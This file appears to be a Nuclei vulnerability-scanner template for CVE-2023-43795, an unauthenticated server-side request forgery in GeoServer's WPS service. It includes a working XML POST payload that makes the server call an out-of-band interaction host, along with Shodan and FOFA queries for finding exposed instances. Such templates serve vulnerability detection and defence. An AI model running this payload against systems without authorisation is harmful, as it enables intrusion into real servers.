nuclei-templates/http/cves/2023/CVE-2023-43795.yaml

84 lines
3.2 KiB
YAML

id: CVE-2023-43795
info:
name: GeoServer WPS - Server Side Request Forgery
author: DhiyaneshDK
severity: critical
description: |
GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.
reference:
- https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms.html
- https://github.com/geoserver/geoserver/security/advisories/GHSA-5pr3-m5hm-9956
- https://nvd.nist.gov/vuln/detail/CVE-2023-43795
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-43795
cwe-id: CWE-918
epss-score: 0.12207
epss-percentile: 0.94786
cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: osgeo
product: geoserver
shodan-query: title:"GeoServer"
fofa-query: app="GeoServer"
tags: cve,cve2023,geoserver,ssrf,oast,oos
variables:
oast: "{{interactsh-url}}"
string: "{{to_lower(rand_text_alpha(4))}}"
value: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST {{path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://www.opengis.net/wps/1.0.0"
xmlns:wfs="http://www.opengis.net/wfs"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1"
xmlns:gml="http://www.opengis.net/gml"
xmlns:ogc="http://www.opengis.net/ogc"
xmlns:wcs="http://www.opengis.net/wcs/1.1.1"
xmlns:xlink="http://www.w3.org/1999/xlink"
xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
<ows:Identifier>JTS:area</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>geom</ows:Identifier>
<wps:Reference mimeType="application/json" xlink:href="https://{{oast}}" method="GET">
<wps:Header key="{{string}}" value="{{value}}"/>
</wps:Reference>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput>
<ows:Identifier>result</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
payloads:
path:
- /wms
- /geoserver/wms
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, 'http')
- contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')
- status_code == 200
condition: and
# digest: 4a0a00473045022062f2b8599972cbe2e0250d9268e1362749b6315db9addc45852a1a6d8eb1bc6f022100b9121689ee9192454a6a788523a68274865c01e0bead530f589c94117db533d4:922c64590222798bb761d5b6d8e72950